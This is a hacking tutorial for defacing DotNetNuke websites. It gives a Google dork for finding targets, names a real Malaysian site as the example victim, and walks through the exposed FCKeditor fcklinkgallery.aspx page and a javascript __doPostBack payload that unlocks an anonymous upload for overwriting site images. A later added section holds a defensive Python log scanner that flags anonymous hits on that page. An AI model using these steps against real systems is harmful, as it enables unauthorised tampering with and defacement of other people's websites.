(DOT NET NUKE) XPLOIT

The things that must be prepared for the first phase are:
1. Your favorite browser
2. Notepad
3. Carefulness (this is important)
First we look for a target. Open a browser, go to Google and type the following dork, which is still fresh:
inurl: "/ portals / 0"
For example, as in the screenshot below:
The target in the screenshot above is a website from the neighboring country (Google.com.my really is great).
Go to the homepage of the target website above. Then check every image that is located in the path:
/Portals/0/
Copy the location / address of the image and save it in Notepad.
For example, my target is at:
http://www.metrodriving.com.my/
We look for the files that are easiest to use, for example image files such as banners. In this case, I copy the URL of one of the existing images on this page:
http://www.metrodriving.com.my/Home/tabid/110/Default.aspx
If the browser is Mozilla, move the cursor over the picture, then right-click and choose "Copy Image Location". This gives the following address:
http://www.metrodriving.com.my/Portals/0/MDA/b.JPG
Paste the image URL above into Notepad. The current image file name is b.JPG.
Next, prepare a new image that will be used to inject / overwrite the existing file, and rename the new image so that it has the same name and extension. In the example above, the file is named b.JPG, so the picture we upload later must have the same name and extension.
Now it is time for the exploit stages. Try entering the following path:
/Providers/HtmlEditorProviders/fck/fcklinkgallery.aspx
Simply copy and paste the path above onto the site address so it looks like:
http://www.WebsiteTarget.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
In this case, I paste it onto the target link as follows:
http://www.metrodriving.com.my/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
The following page then appears:
As in the picture above, there are three options under "Link Type". Because what will be injected is the picture from before, select the third option under "Link Type"; we select the file b.JPG. After selecting the third option, "File (A File From Your Site)", replace the URL in the address bar with the script below:
javascript: __doPostBack ('$ ctlURL cmdUpload','')
Then press Enter. After running the JavaScript above, we will see the option to upload files, as in the screenshot below:
Last: make sure you have changed the file name and extension to b.JPG as mentioned above, and then upload the file. Once that is done, go to the homepage where the image is located, as I did above. The result:
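For the site owner, the steps above leave a trace in the web server log: unauthenticated requests to fcklinkgallery.aspx that succeed. The following is an added example, not part of the original post, that scans IIS W3C log lines for them; the log sample is constructed, and it assumes cs-username is populated for logged-in users (where it is not, every hit needs review).

```python
import re

# Constructed IIS W3C sample (not from the page); client IPs are documentation ranges.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time cs-method cs-uri-stem cs-uri-query cs-username c-ip sc-status
2011-03-01 10:00:01 GET /Home/tabid/110/Default.aspx - - 203.0.113.7 200
2011-03-01 10:02:10 GET /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx - - 203.0.113.7 200
2011-03-01 10:02:55 POST /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx - - 203.0.113.7 200
2011-03-01 10:03:20 GET /Portals/0/banner.jpg - - 203.0.113.7 200
2011-03-01 11:15:00 POST /providers/htmleditorproviders/fck/fcklinkgallery.aspx - editor1 198.51.100.4 200
2011-03-01 11:20:00 POST /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx - - 203.0.113.9 302
"""

# IIS paths are case-insensitive, so match the page name regardless of case.
GALLERY = re.compile(r"/providers/htmleditorproviders/fck/fcklinkgallery\.aspx$", re.I)


def parse_w3c(text):
    """Yield one dict per log entry, using the #Fields header for column names."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split()
            if len(parts) == len(fields):  # skip truncated or malformed rows
                yield dict(zip(fields, parts))


def find_anonymous_gallery_use(text):
    """Return (date, time, client IP, kind) for successful anonymous hits on the page."""
    findings = []
    for e in parse_w3c(text):
        if not GALLERY.search(e.get("cs-uri-stem", "")):
            continue
        anonymous = e.get("cs-username", "-") == "-"
        if not anonymous or not e.get("sc-status", "").startswith("2"):
            continue  # authenticated editor, or request redirected/denied
        kind = "upload-postback" if e.get("cs-method") == "POST" else "page-exposed"
        findings.append((e["date"], e["time"], e["c-ip"], kind))
    return findings


if __name__ == "__main__":
    for finding in find_anonymous_gallery_use(SAMPLE_LOG):
        print(*finding)
```

Any finding is a reason to compare the files under /Portals/0/ against a known-good copy and to restrict anonymous access to the page.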